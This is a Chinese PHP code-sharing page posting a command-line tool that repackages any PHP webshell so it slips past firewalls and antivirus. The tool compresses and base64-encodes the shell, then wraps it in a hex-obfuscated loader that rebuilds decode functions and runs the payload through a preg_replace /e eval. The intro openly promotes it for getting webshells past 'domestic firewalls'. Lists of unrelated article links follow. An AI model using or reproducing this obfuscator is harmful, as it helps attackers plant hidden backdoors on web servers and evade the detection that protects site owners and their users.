php shell超强免杀、减少体积工具实现代码


Posted in PHP onOctober 16, 2012

lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙

<?php 
/* 
Title: PHP shell nokill T00L 
Blog: exploit-db.blogcn.com 
*/ 
error_reporting(0); 
@ini_set('memory_limit','-1'); 
set_time_limit(0); 
$toolname="$argv[0]"; 
if ($argc<2) { 
baner($toolname); 
die; 
} 
$input_file= trim($argv[1]); 
$output_file='nokill_'.$input_file; 
if (file_exists($input_file)) { 
No_kill_c0de($input_file,$output_file); 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Input: {$input_file}\r\n"; 
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; 
echo "[+] Generate success!\r\n"; 
echo "Saved to {$file_full_path}"."\r\n"; 
} else { 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
die("[-] Failed ! The File $input_file does not exist"); 
} 
function No_kill_c0de($input_file,$output_file){ 
$no_whitespace=php_strip_whitespace($input_file); 
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); 
$enfile=base64_encode(gzdeflate($no_php_tag)); 
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa"; 
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa"; 
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa"; 
$shellcode.="\x3f\x3e"; 
file_put_contents("$output_file",$shellcode); 
} 
function baner($toolname){ 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Usage: {$toolname} phpwebshell\r\n"; 
} 
?>
PHP 相关文章推荐
c#中的实现php中的preg_replace
Dec 21 PHP
php获取当前网址url并替换参数或网址的方法
Jun 06 PHP
sphinx增量索引的一个问题
Jun 14 PHP
php连接Access数据库错误及解决方法
Jun 20 PHP
ThinkPHP之getField详解
Jun 20 PHP
destoon实现底部添加你是第几位访问者的方法
Jul 15 PHP
php图像处理类实例
Jul 28 PHP
基于命令行执行带参数的php脚本并取得参数的方法
Jan 25 PHP
php注册登录系统简化版
Dec 28 PHP
yii2中结合gridview如何使用modal弹窗实例代码详解
Jun 12 PHP
php使用scandir()函数扫描指定目录下所有文件示例
Jun 08 PHP
PHP 判断字符串是中文还是英文, 或者是中英混合
Mar 09 PHP
PHP中替换换行符的几种方法小结
Oct 15 #PHP
php变量范围介绍
Oct 15 #PHP
php模板函数 正则实现代码
Oct 15 #PHP
php mssql扩展SQL查询中文字段名解决方法
Oct 15 #PHP
PHP获取文件后缀名的三个函数
Oct 15 #PHP
php标签云的实现代码
Oct 10 #PHP
域名和cookie问题(域名后缀)
Oct 10 #PHP
You might like
PHP.MVC的模板标签系统(二)
2006/09/05 PHP
PHP自带ZIP压缩、解压缩类ZipArchiv使用指南
2015/03/03 PHP
基于php实现随机合并数组并排序(原排序)
2015/11/26 PHP
PHP 极验验证码实例讲解
2016/09/29 PHP
PHP 实现人民币小写转换成大写的方法及大小写转换函数
2017/11/17 PHP
jQuery 操作下拉列表框实现代码
2010/02/22 Javascript
基于jquery.Jcrop的头像编辑器
2010/03/01 Javascript
Easy.Ajax 部分源代码 支持文件上传功能, 兼容所有主流浏览器
2011/02/24 Javascript
JQuery对class属性的操作实现按钮开关效果
2013/10/11 Javascript
实现51Map地图接口(示例代码)
2013/11/22 Javascript
confirm的用法示例用于按钮操作时确定是否执行
2014/06/19 Javascript
在javascript中使用com组件的简单实现方法
2016/08/17 Javascript
利用jquery正则表达式在页面验证url网址输入是否正确
2017/04/04 jQuery
微信小程序获取微信运动步数的实例代码
2017/07/20 Javascript
webpack 1.x升级过程中的踩坑总结大全
2017/08/09 Javascript
Gulp实现静态网页模块化的方法详解
2018/01/09 Javascript
快速解决brew安装特定版本flow的问题
2018/05/17 Javascript
纯javascript实现选择框的全选与反选功能
2019/04/08 Javascript
微信小程序云开发实现数据添加、查询和分页
2019/05/17 Javascript
Python标准库之多进程(multiprocessing包)介绍
2014/11/25 Python
python检测远程端口是否打开的方法
2015/03/14 Python
Python2.7 实现引入自己写的类方法
2018/04/29 Python
Python判断中文字符串是否相等的实例
2018/07/06 Python
对python指数、幂数拟合curve_fit详解
2018/12/29 Python
python使用 request 发送表单数据操作示例
2019/09/25 Python
pytorch 准备、训练和测试自己的图片数据的方法
2020/01/10 Python
Python request操作步骤及代码实例
2020/04/13 Python
波兰家居和花园家具专家:4Home
2019/05/26 全球购物
中东奢侈品购物网站:Ounass
2020/09/02 全球购物
公益活动策划方案
2014/01/09 职场文书
运动会横幅标语
2014/06/17 职场文书
爱护公物演讲稿
2014/09/09 职场文书
高校自主招生校长推荐信
2015/03/23 职场文书
2015年幼儿园学前班工作总结
2015/05/18 职场文书
如何使用pdb进行Python调试
2021/06/30 Python
win10系统xps文件怎么打开?win10打开xps文件的两种操作方法
2022/07/23 数码科技